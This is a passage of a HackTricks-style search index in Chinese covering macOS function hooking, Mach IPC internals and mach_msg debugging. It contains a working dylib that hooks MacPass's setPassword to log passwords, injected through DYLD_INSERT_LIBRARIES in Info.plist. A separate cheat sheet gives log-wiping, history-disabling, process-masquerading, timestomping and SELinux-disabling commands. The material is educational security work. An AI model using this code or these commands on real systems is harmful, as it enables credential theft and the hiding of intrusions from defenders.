(unsigned long) &_replacement, \\\\\\n(const void*) (unsigned long) &_replacee \\\\\\n}; int my_printf(const char *format, ...)\\n{\\nint ret = printf(\\"Hello from interpose\\\\n\\");\\nreturn ret;\\n} DYLD_INTERPOSE(my_printf,printf); bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello\\nHello from interpose 
DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello\\nHello from interpose warning DYLD_PRINT_INTERPOSTING 环境变量可用于调试插入,并将打印插入过程。 还要注意, 插入发生在进程和加载的库之间 ,它不适用于共享库缓存。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 插入 printf","id":"2387","title":"插入 printf"},"2388":{"body":"现在也可以使用 dyld_dynamic_interpose 动态插入一个函数。这允许在运行时以编程方式插入一个函数,而不是仅仅从一开始就这样做。 只需指明 要替换的函数和替换函数的元组 。 c struct dyld_interpose_tuple {\\nconst void* replacement;\\nconst void* replacee;\\n};\\nextern void dyld_dynamic_interpose(const struct mach_header* mh,\\nconst struct dyld_interpose_tuple array[], size_t count);","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 动态插入","id":"2388","title":"动态插入"},"2389":{"body":"在 ObjectiveC 中,方法调用的方式是: [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2] 需要 对象 、 方法 和 参数 。当调用一个方法时,使用函数 objc_msgSend 发送 msg :int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2); 对象是 someObject ,方法是 @selector(method1p1:p2:) ,参数是 value1 , value2 。 根据对象结构,可以访问一个 方法数组 ,其中 名称 和 指向方法代码的指针 被 存放 。 caution 请注意,由于方法和类是基于其名称访问的,因此这些信息存储在二进制文件中,因此可以使用 otool -ov 或 class-dump 来检索。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 方法交换","id":"2389","title":"方法交换"},"239":{"body":"通道 传输 解码 说明 ICMP – EchoBackdoor ICMP Echo Req/Rep 4-byte key + 14-byte chunks (XOR) 纯被动监听器,无外发流量 DNS – NoDepDNS UDP 53 XOR (key = funnyAndHappy) encoded in A-record octets 监控 *.nodep 子域名 GTP – GTPDoor UDP 2123 AES-128-CBC blob in private IE 与合法的 GTP-C 通信混合 All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 5. 隐蔽通道","id":"239","title":"5. 
隐蔽通道"},"2390":{"body":"可以访问方法的信息,例如名称、参数数量或地址,如以下示例所示: objectivec // gcc -framework Foundation test.m -o test #import \\n#import \\n#import int main() {\\n// Get class of the variable\\nNSString* str = @\\"This is an example\\";\\nClass strClass = [str class];\\nNSLog(@\\"str\'s Class name: %s\\", class_getName(strClass)); // Get parent class of a class\\nClass strSuper = class_getSuperclass(strClass);\\nNSLog(@\\"Superclass name: %@\\",NSStringFromClass(strSuper)); // Get information about a method\\nSEL sel = @selector(length);\\nNSLog(@\\"Selector name: %@\\", NSStringFromSelector(sel));\\nMethod m = class_getInstanceMethod(strClass,sel);\\nNSLog(@\\"Number of arguments: %d\\", method_getNumberOfArguments(m));\\nNSLog(@\\"Implementation address: 0x%lx\\", (unsigned long)method_getImplementation(m)); // Iterate through the class hierarchy\\nNSLog(@\\"Listing methods:\\");\\nClass currentClass = strClass;\\nwhile (currentClass != NULL) {\\nunsigned int inheritedMethodCount = 0;\\nMethod* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); NSLog(@\\"Number of inherited methods in %s: %u\\", class_getName(currentClass), inheritedMethodCount); for (unsigned int i = 0; i < inheritedMethodCount; i++) {\\nMethod method = inheritedMethods[i];\\nSEL selector = method_getName(method);\\nconst char* methodName = sel_getName(selector);\\nunsigned long address = (unsigned long)method_getImplementation(m);\\nNSLog(@\\"Inherited method name: %s (0x%lx)\\", methodName, address);\\n} // Free the memory allocated by class_copyMethodList\\nfree(inheritedMethods);\\ncurrentClass = class_getSuperclass(currentClass);\\n} // Other ways to call uppercaseString method\\nif([str respondsToSelector:@selector(uppercaseString)]) {\\nNSString *uppercaseString = [str performSelector:@selector(uppercaseString)];\\nNSLog(@\\"Uppercase string: %@\\", uppercaseString);\\n} // Using objc_msgSend directly\\nNSString *uppercaseString2 = ((NSString *(*)(id, 
SEL))objc_msgSend)(str, @selector(uppercaseString));\\nNSLog(@\\"Uppercase string: %@\\", uppercaseString2); // Calling the address directly\\nIMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address\\nNSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp\\nNSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method\\nNSLog(@\\"Uppercase string: %@\\", uppercaseString3); return 0;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 访问原始方法","id":"2390","title":"访问原始方法"},"2391":{"body":"函数 method_exchangeImplementations 允许 更改 一个函数的实现地址为另一个函数的实现地址 。 caution 因此,当调用一个函数时, 执行的是另一个函数 。 objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str #import \\n#import // Create a new category for NSString with the method to execute\\n@interface NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {\\nNSLog(@\\"Custom implementation of substringFromIndex:\\"); // Call the original method\\nreturn [self swizzledSubstringFromIndex:from];\\n} @end int main(int argc, const char * argv[]) {\\n// Perform method swizzling\\nMethod originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));\\nMethod swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));\\nmethod_exchangeImplementations(originalMethod, swizzledMethod); // We changed the address of one method for the other\\n// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex\\n// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled // Example usage\\nNSString *myString = @\\"Hello, World!\\";\\nNSString *subString = [myString 
substringFromIndex:7];\\nNSLog(@\\"Substring: %@\\", subString); return 0;\\n} warning 在这种情况下,如果 合法 方法的 实现代码 对 方法 的 名称 进行 验证 ,它可能会 检测到 这种交换并阻止其运行。 以下技术没有这个限制。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » Method Swizzling with method_exchangeImplementations","id":"2391","title":"Method Swizzling with method_exchangeImplementations"},"2392":{"body":"之前的格式很奇怪,因为你正在将两个方法的实现互相更改。使用函数 method_setImplementation ,你可以 更改 一个 方法的实现为另一个 。 只需记住,如果你打算在覆盖之前从新实现中调用原始实现,请 存储原始实现的地址 ,因为稍后定位该地址会更加复杂。 objectivec #import \\n#import \\n#import static IMP original_substringFromIndex = NULL; @interface NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {\\nNSLog(@\\"Custom implementation of substringFromIndex:\\"); // Call the original implementation using objc_msgSendSuper\\nreturn ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);\\n} @end int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Get the class of the target method\\nClass stringClass = [NSString class]; // Get the swizzled and original methods\\nMethod originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); // Get the function pointer to the swizzled method\'s implementation\\nIMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); // Swap the implementations\\n// It return the now overwritten implementation of the original method to store it\\noriginal_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); // Example usage\\nNSString *myString = @\\"Hello, World!\\";\\nNSString *subString = [myString substringFromIndex:7];\\nNSLog(@\\"Substring: %@\\", subString); // Set the original implementation back\\nmethod_setImplementation(originalMethod, 
original_substringFromIndex); return 0;\\n}\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 使用 method_setImplementation 进行方法交换","id":"2392","title":"使用 method_setImplementation 进行方法交换"},"2393":{"body":"在本页中讨论了不同的函数钩取方法。然而,它们涉及到 在进程内部运行代码进行攻击 。 为了做到这一点,最简单的技术是通过环境变量或劫持来注入一个 Dyld 。不过,我想这也可以通过 Dylib进程注入 来完成。 然而,这两种选项都 限制 于 未保护 的二进制文件/进程。检查每种技术以了解更多关于限制的信息。 然而,函数钩取攻击是非常具体的,攻击者会这样做以 从进程内部窃取敏感信息 (否则你只会进行进程注入攻击)。而这些敏感信息可能位于用户下载的应用程序中,例如MacPass。 因此,攻击者的途径是找到一个漏洞或去掉应用程序的签名,通过应用程序的Info.plist注入**DYLD_INSERT_LIBRARIES**环境变量,添加类似于: xml LSEnvironment\\n\\nDYLD_INSERT_LIBRARIES\\n/Applications/Application.app/Contents/malicious.dylib\\n 然后 重新注册 该应用程序: bash /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app 在该库中添加钩子代码以提取信息:密码、消息... caution 请注意,在较新版本的 macOS 中,如果您 去除应用程序二进制文件的签名 ,并且它之前已被执行,macOS 将不再执行该应用程序 。 库示例 objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib // If you added env vars in the Info.plist don\'t forget to call lsregister as explained before // Listen to the logs with something like:\\n// log stream --style syslog --predicate \'eventMessage CONTAINS[c] \\"Password\\"\' #include \\n#import // Here will be stored the real method (setPassword in this case) address\\nstatic IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)\\n{\\n// Function that will log the password and call the original setPassword(pass, file_path) method\\nNSLog(@\\"[+] Password is: %@\\", password); // After logging the password call the original method so nothing breaks.\\nreturn ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);\\n} // Library constructor to execute\\n__attribute__((constructor))\\nstatic void customConstructor(int argc, const char **argv) {\\n// Get the real method address to not lose it\\nClass 
classMPDocument = NSClassFromString(@\\"MPDocument\\");\\nMethod real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); // Make the original method setPassword call the fake implementation one\\nIMP fake_IMP = (IMP)custom_setPassword;\\nreal_setPassword = method_setImplementation(real_Method, fake_IMP);\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » Hooking Attack Methodology","id":"2393","title":"Hooking Attack Methodology"},"2394":{"body":"https://nshipster.com/method-swizzling/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 参考","id":"2394","title":"参考"},"2395":{"body":"Reading time: 45 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS IPC - 进程间通信","id":"2395","title":"macOS IPC - 进程间通信"},"2396":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » Mach 通过端口进行消息传递","id":"2396","title":"Mach 通过端口进行消息传递"},"2397":{"body":"Mach 使用 任务 作为共享资源的 最小单位 ,每个任务可以包含 多个线程 。这些 任务和线程与 POSIX 进程和线程 1:1 映射 。 任务之间的通信通过 Mach 进程间通信 (IPC) 进行,利用单向通信通道。 消息在端口之间传输 ,这些端口充当由内核管理的 消息队列 。 端口 是 Mach IPC 的 基本 元素。它可以用来 发送和接收 消息。 每个进程都有一个 IPC 表 ,在其中可以找到 进程的 mach 端口 。mach 端口的名称实际上是一个数字(它是该任务 IPC 表中的索引,内核据此找到对应的内核对象;它不是指针,也只在该任务内有意义,不能直接在另一个任务中使用)。 一个进程还可以将一个端口名称和一些权限 发送给不同的任务 ,内核会在 另一个任务的 IPC 表 中显示这个条目。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 基本信息","id":"2397","title":"基本信息"},"2398":{"body":"端口权限定义了任务可以执行的操作,是这种通信的关键。可能的 端口权限 是 ( 定义来自这里 ): 接收权限 ,允许接收发送到端口的消息。Mach 端口是 MPSC(多个生产者,单个消费者)队列,这意味着在整个系统中每个端口只能有 一个接收权限 (与管道不同,多个进程可以持有一个管道的读端文件描述符)。 拥有 接收权限 的任务可以接收消息并 创建发送权限 ,允许其发送消息。最初只有 自己的任务对其端口拥有接收权限 。 如果接收权限的拥有者 死亡 或被杀死, 发送权限将变得无用(死名称) 。 发送权限 ,允许向端口发送消息。 发送权限可以被 克隆 ,因此拥有发送权限的任务可以克隆该权限并 授予给第三个任务 。 请注意, 端口权限 也可以通过 Mach 消息 传递 。 一次性发送权限 ,允许向端口发送一条消息,然后消失。 该权限 不能 被 克隆 ,但可以被 移动 。 端口集权限 ,表示一个 端口集 而不是单个端口。从端口集中出队一条消息会从其包含的一个端口中出队一条消息。端口集可以用来同时监听多个端口,类似于 Unix 中的 select/poll/epoll/kqueue。 死名称 ,这不是一个实际的端口权限,而仅仅是一个占位符。当一个端口被销毁时,所有现有的对该端口的端口权限都会变成死名称。 任务可以将发送权限转移给其他任务 ,使其能够发送消息。 发送权限也可以被克隆,因此一个任务可以复制并将权限授予第三个任务 。这与一个称为 引导服务器 的中介进程结合,使任务之间的有效通信成为可能。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 端口权限","id":"2398","title":"端口权限"},"2399":{"body":"文件端口允许在 Mach 端口中封装文件描述符(使用 Mach 端口权限)。可以使用 fileport_makeport 从给定的 FD 创建一个 fileport,并使用 fileport_makefd 从 fileport 创建一个 FD。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 
文件端口","id":"2399","title":"文件端口"},"24":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Methodology » Pentesting Methodology","id":"24","title":"Pentesting Methodology"},"240":{"body":"bash # Remove attacker IPs from wtmp\\nutmpdump /var/log/wtmp | sed \'/203\\\\.0\\\\.113\\\\.66/d\' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp # Disable bash history\\nexport HISTFILE=/dev/null # Masquerade as kernel thread\\necho 0 > /proc/$$/autogroup # hide from top/htop\\nprintf \'\\\\0\' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp\\nsetenforce 0 # disable SELinux","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 6. 防御规避 速查表","id":"240","title":"6. 防御规避 速查表"},"2400":{"body":"如前所述,可以使用 Mach 消息发送权限,然而,您 不能在没有发送 Mach 消息的权限的情况下发送权限 。那么,如何建立第一次通信呢? 
为此, 引导服务器 (在 mac 中为 launchd )参与其中,因为 任何人都可以获得引导服务器的发送权限 ,可以请求它发送消息到另一个进程的权限: 任务 A 创建一个 新端口 ,获得该端口的 接收权限 。 任务 A ,作为接收权限的持有者, 为该端口生成一个发送权限 。 任务 A 与 引导服务器 建立 连接 ,并 将其为最初生成的端口发送的发送权限 发送给它。 请记住,任何人都可以获得引导服务器的发送权限。 任务 A 向引导服务器发送 bootstrap_register 消息,以 将给定端口与名称关联 ,如 com.apple.taska。 任务 B 与 引导服务器 交互以执行服务名称的引导 查找 (bootstrap_lookup)。因此,引导服务器可以响应,任务 B 将在查找消息中发送一个 发送权限到它之前创建的端口 。如果查找成功, 服务器将复制从任务 A 接收到的发送权限 并 传输给任务 B 。 请记住,任何人都可以获得引导服务器的发送权限。 通过这个发送权限, 任务 B 能够 发送 一条 消息 给任务 A 。 对于双向通信,通常任务 B 会生成一个带有 接收 权限和 发送 权限的新端口,并将 发送权限授予任务 A ,以便它可以向任务 B 发送消息(双向通信)。 引导服务器 无法验证 任务声称的服务名称。这意味着一个 任务 可能会 冒充任何系统任务 ,例如虚假 声称一个授权服务名称 ,然后批准每个请求。 然后,Apple 将 系统提供的服务名称 存储在安全配置文件中,位于 SIP 保护 的目录中:/System/Library/LaunchDaemons 和 /System/Library/LaunchAgents。每个服务名称旁边, 相关的二进制文件也被存储 。引导服务器将为这些服务名称创建并持有 接收权限 。 对于这些预定义的服务, 查找过程略有不同 。当查找服务名称时,launchd 动态启动该服务。新的工作流程如下: 任务 B 启动对服务名称的引导 查找 。 launchd 检查任务是否正在运行,如果没有,则 启动 它。 任务 A (服务)执行 引导签到 (bootstrap_check_in())。在这里, 引导 服务器创建一个发送权限,保留它,并 将接收权限转移给任务 A 。 launchd 复制 发送权限并将其发送给任务 B 。 任务 B 生成一个带有 接收 权限和 发送 权限的新端口,并将 发送权限授予任务 A (服务),以便它可以向任务 B 发送消息(双向通信)。 然而,这个过程仅适用于预定义的系统任务。非系统任务仍然按照最初描述的方式操作,这可能会允许冒充。 caution 因此,launchd 永远不应崩溃,否则整个系统将崩溃。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 建立通信","id":"2400","title":"建立通信"},"2401":{"body":"在这里找到更多信息 mach_msg 函数,基本上是一个系统调用,用于发送和接收 Mach 消息。该函数要求将要发送的消息作为初始参数。此消息必须以 mach_msg_header_t 结构开始,后面跟着实际的消息内容。该结构定义如下: c typedef struct {\\nmach_msg_bits_t msgh_bits;\\nmach_msg_size_t msgh_size;\\nmach_port_t msgh_remote_port;\\nmach_port_t msgh_local_port;\\nmach_port_name_t msgh_voucher_port;\\nmach_msg_id_t msgh_id;\\n} mach_msg_header_t; 进程拥有 接收权 可以在 Mach 端口上接收消息。相反, 发送者 被授予 发送 或 一次性发送权 。一次性发送权专门用于发送单个消息,之后它将失效。 初始字段 msgh_bits 是一个位图(各掩码定义见 mach/message.h): 最高位(第 31 位,MACH_MSGH_BITS_COMPLEX)用于指示消息是否复杂(下面会详细说明) 第 28 位和第 29 位由内核使用(重要性相关标志) 最低字节的 5 个最低有效位 (MACH_MSGH_BITS_REMOTE_MASK) 用于 远程端口 ,即消息的目标端口 第二个字节的 5 个最低有效位 (MACH_MSGH_BITS_LOCAL_MASK) 用于 本地端口 ,即回复端口 第三个字节的 5 个最低有效位 (MACH_MSGH_BITS_VOUCHER_MASK) 用于 凭证 :另一种发送键/值组合的端口类型。 宏 MACH_MSGH_BITS(remote, local) 按此布局组合前两个字段(下面 sender.c 中的 MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) 即把 COPY_SEND 放在远程端口字段)。 可以在远程、本地和凭证端口中指定的类型是(来自 mach/message.h ): c #define MACH_MSG_TYPE_MOVE_RECEIVE 16 /* Must 
hold receive right */\\n#define MACH_MSG_TYPE_MOVE_SEND 17 /* Must hold send right(s) */\\n#define MACH_MSG_TYPE_MOVE_SEND_ONCE 18 /* Must hold sendonce right */\\n#define MACH_MSG_TYPE_COPY_SEND 19 /* Must hold send right(s) */\\n#define MACH_MSG_TYPE_MAKE_SEND 20 /* Must hold receive right */\\n#define MACH_MSG_TYPE_MAKE_SEND_ONCE 21 /* Must hold receive right */\\n#define MACH_MSG_TYPE_COPY_RECEIVE 22 /* NOT VALID */\\n#define MACH_MSG_TYPE_DISPOSE_RECEIVE 24 /* must hold receive right */\\n#define MACH_MSG_TYPE_DISPOSE_SEND 25 /* must hold send right(s) */\\n#define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26 /* must hold sendonce right */ 例如,MACH_MSG_TYPE_MAKE_SEND_ONCE 可用于 指示 应该为此端口派生并转移一个 一次性发送权 。也可以指定 MACH_PORT_NULL 以防止接收者能够回复。 为了实现简单的 双向通信 ,进程可以在 mach 消息头 中指定一个 mach 端口 ,称为 回复端口 ( msgh_local_port ),接收该消息的 接收者 可以 发送回复 。 tip 请注意,这种双向通信用于期望回复的 XPC 消息中(xpc_connection_send_message_with_reply 和 xpc_connection_send_message_with_reply_sync)。但 通常会创建不同的端口 ,如前所述,以创建双向通信。 消息头的其他字段包括: msgh_size: 整个数据包的大小。 msgh_remote_port: 消息的目标端口。发送时由发送者填入要发送到的端口;消息被接收后内核会交换这两个端口字段,接收者看到的 msgh_remote_port 是发送者提供的回复端口,而 msgh_local_port 是收到消息的端口。 msgh_voucher_port: mach 代金券 。 msgh_id: 此消息的 ID,由接收者解释。 caution 请注意, mach 消息是通过 mach port 发送的 ,这是一个 单接收者 、 多个发送者 的通信通道,内置于 mach 内核中。 多个进程 可以 向 mach 端口发送消息 ,但在任何时候只有 一个进程可以从中读取 。 消息由 mach_msg_header_t 头部、 主体 和 尾部 (如果有的话)组成,并且可以授予回复的权限。在这些情况下,内核只需将消息从一个任务传递到另一个任务。 尾部 是 内核添加到消息的信息 (用户无法设置),可以在消息接收时使用标志 MACH_RCV_TRAILER_ 请求(可以请求不同的信息)。例如 MACH_RCV_TRAILER_AUDIT 会附带发送者的 audit token ;由于它由内核填写而不是由发送者提供,服务端应据此(而不是消息体中自称的 PID 或身份)来识别和鉴别发送者。 复杂消息 然而,还有其他更 复杂 的消息,例如传递额外端口权或共享内存的消息,在这些情况下,内核还需要将这些对象发送给接收者。在这种情况下,头部的最显著位 msgh_bits 被设置。 可以传递的可能描述符在 mach/message.h 中定义: c #define MACH_MSG_PORT_DESCRIPTOR 0\\n#define MACH_MSG_OOL_DESCRIPTOR 1\\n#define MACH_MSG_OOL_PORTS_DESCRIPTOR 2\\n#define MACH_MSG_OOL_VOLATILE_DESCRIPTOR 3\\n#define MACH_MSG_GUARDED_PORT_DESCRIPTOR 4 #pragma pack(push, 4) typedef struct{\\nnatural_t pad1;\\nmach_msg_size_t pad2;\\nunsigned int pad3 : 24;\\nmach_msg_descriptor_type_t type : 8;\\n} mach_msg_type_descriptor_t; 在32位中,所有描述符都是12B,描述符类型在第11个字节中。在64位中,大小各不相同。 caution 内核会将描述符从一个任务复制到另一个任务,但首先 在内核内存中创建一个副本 。这种技术被称为“风水”,在多个漏洞中被滥用,以使 
内核在其内存中复制数据 ,使一个进程将描述符发送给自己。然后,该进程可以接收消息(内核会释放它们)。 也可以 将端口权限发送到一个易受攻击的进程 ,端口权限将直接出现在该进程中(即使它没有处理这些权限)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 一个 Mach 消息","id":"2401","title":"一个 Mach 消息"},"2402":{"body":"请注意,端口与任务命名空间相关联,因此要创建或搜索端口,还会查询任务命名空间(更多信息见mach/mach_port.h): mach_port_allocate | mach_port_construct : 创建 一个端口。 mach_port_allocate 还可以创建一个 端口集 :对一组端口的接收权限。每当接收到消息时,会指明消息来自哪个端口。 mach_port_allocate_name: 更改端口的名称(默认是32位整数) mach_port_names: 从目标获取端口名称 mach_port_type: 获取任务对名称的权限 mach_port_rename: 重命名端口(类似于FD的dup2) mach_port_allocate: 分配一个新的RECEIVE、PORT_SET或DEAD_NAME mach_port_insert_right: 在您拥有RECEIVE的端口中创建一个新权限 mach_port_... mach_msg | mach_msg_overwrite : 用于 发送和接收mach消息 的函数。覆盖版本允许为消息接收指定不同的缓冲区(另一个版本将仅重用它)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » Mac Ports APIs","id":"2402","title":"Mac Ports APIs"},"2403":{"body":"由于**mach_msg 和 mach_msg_overwrite**是用于发送和接收消息的函数,因此在它们上设置断点将允许检查发送和接收的消息。 例如,开始调试您可以调试的任何应用程序,因为它将加载**libSystem.B,该库将使用此函数**。 (lldb) b mach_msg\\nBreakpoint 1: where = libsystem_kernel.dylib`mach_msg, address = 0x00000001803f6c20\\n(lldb) r\\nProcess 71019 launched: \'/Users/carlospolop/Desktop/sandboxedapp/SandboxedShellAppDown.app/Contents/MacOS/SandboxedShellApp\' (arm64)\\nProcess 71019 stopped\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\nframe #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg\\nlibsystem_kernel.dylib`mach_msg:\\n-> 0x181d3ac20 <+0>: pacibsp\\n0x181d3ac24 <+4>: sub sp, sp, #0x20\\n0x181d3ac28 <+8>: stp x29, x30, [sp, #0x10]\\n0x181d3ac2c <+12>: add x29, sp, #0x10\\nTarget 0: (SandboxedShellApp) stopped.\\n(lldb) bt\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\n* frame #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg\\nframe #1: 0x0000000181ac3454 libxpc.dylib`_xpc_pipe_mach_msg + 56\\nframe #2: 
0x0000000181ac2c8c libxpc.dylib`_xpc_pipe_routine + 388\\nframe #3: 0x0000000181a9a710 libxpc.dylib`_xpc_interface_routine + 208\\nframe #4: 0x0000000181abbe24 libxpc.dylib`_xpc_init_pid_domain + 348\\nframe #5: 0x0000000181abb398 libxpc.dylib`_xpc_uncork_pid_domain_locked + 76\\nframe #6: 0x0000000181abbbfc libxpc.dylib`_xpc_early_init + 92\\nframe #7: 0x0000000181a9583c libxpc.dylib`_libxpc_initializer + 1104\\nframe #8: 0x000000018e59e6ac libSystem.B.dylib`libSystem_initializer + 236\\nframe #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&) const::$_0::operator()() const + 168 要获取**mach_msg**的参数,请检查寄存器。这些是参数(来自 mach/message.h ): c __WATCHOS_PROHIBITED __TVOS_PROHIBITED\\nextern mach_msg_return_t mach_msg(\\nmach_msg_header_t *msg,\\nmach_msg_option_t option,\\nmach_msg_size_t send_size,\\nmach_msg_size_t rcv_size,\\nmach_port_name_t rcv_name,\\nmach_msg_timeout_t timeout,\\nmach_port_name_t notify); 从寄存器中读取参数值(arm64 下前 8 个整数参数依次位于 x0-x7): armasm reg read $x0 $x1 $x2 $x3 $x4 $x5 $x6\\nx0 = 0x0000000124e04ce8 ;mach_msg_header_t (*msg)\\nx1 = 0x0000000003114207 ;mach_msg_option_t (option)\\nx2 = 0x0000000000000388 ;mach_msg_size_t (send_size)\\nx3 = 0x0000000000000388 ;mach_msg_size_t (rcv_size)\\nx4 = 0x0000000000001f03 ;mach_port_name_t (rcv_name)\\nx5 = 0x0000000000000000 ;mach_msg_timeout_t (timeout)\\nx6 = 0x0000000000000000 ;mach_port_name_t (notify) 检查消息头,查看第一个参数: armasm (lldb) x/6w $x0\\n0x124e04ce8: 0x00131513 0x00000388 0x00000807 0x00001f03\\n0x124e04cf8: 0x00000b07 0x40000322 ; 0x00131513 -> mach_msg_bits_t (msgh_bits) = 0x13 (MACH_MSG_TYPE_COPY_SEND) in remote (bits 0-7, for destination port 0x807) | 0x1500 (MACH_MSG_TYPE_MAKE_SEND_ONCE) in local (bits 8-15, for reply port 0x1f03 == rcv_name) | 0x130000 (MACH_MSG_TYPE_COPY_SEND) in voucher (bits 16-23)\\n; 0x00000388 -> mach_msg_size_t (msgh_size)\\n; 0x00000807 -> mach_port_t (msgh_remote_port)\\n; 0x00001f03 -> mach_port_t (msgh_local_port)\\n; 0x00000b07 -> mach_port_name_t (msgh_voucher_port)\\n; 0x40000322 -> mach_msg_id_t (msgh_id) 该类型的 
mach_msg_bits_t 非常常见,允许回复。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 调试 mach_msg","id":"2403","title":"调试 mach_msg"},"2404":{"body":"bash lsmp -p sudo lsmp -p 1\\nProcess (1) : launchd\\nname ipc-object rights flags boost reqs recv send sonce oref qlimit msgcount context identifier type\\n--------- ---------- ---------- -------- ----- ---- ----- ----- ----- ---- ------ -------- ------------------ ----------- ------------\\n0x00000203 0x181c4e1d send -------- --- 2 0x00000000 TASK-CONTROL SELF (1) launchd\\n0x00000303 0x183f1f8d recv -------- 0 --- 1 N 5 0 0x0000000000000000\\n0x00000403 0x183eb9dd recv -------- 0 --- 1 N 5 0 0x0000000000000000\\n0x0000051b 0x1840cf3d send -------- --- 2 -> 6 0 0x0000000000000000 0x00011817 (380) WindowServer\\n0x00000603 0x183f698d recv -------- 0 --- 1 N 5 0 0x0000000000000000\\n0x0000070b 0x175915fd recv,send ---GS--- 0 --- 1 2 Y 5 0 0x0000000000000000\\n0x00000803 0x1758794d send -------- --- 1 0x00000000 CLOCK\\n0x0000091b 0x192c71fd send -------- D-- 1 -> 1 0 0x0000000000000000 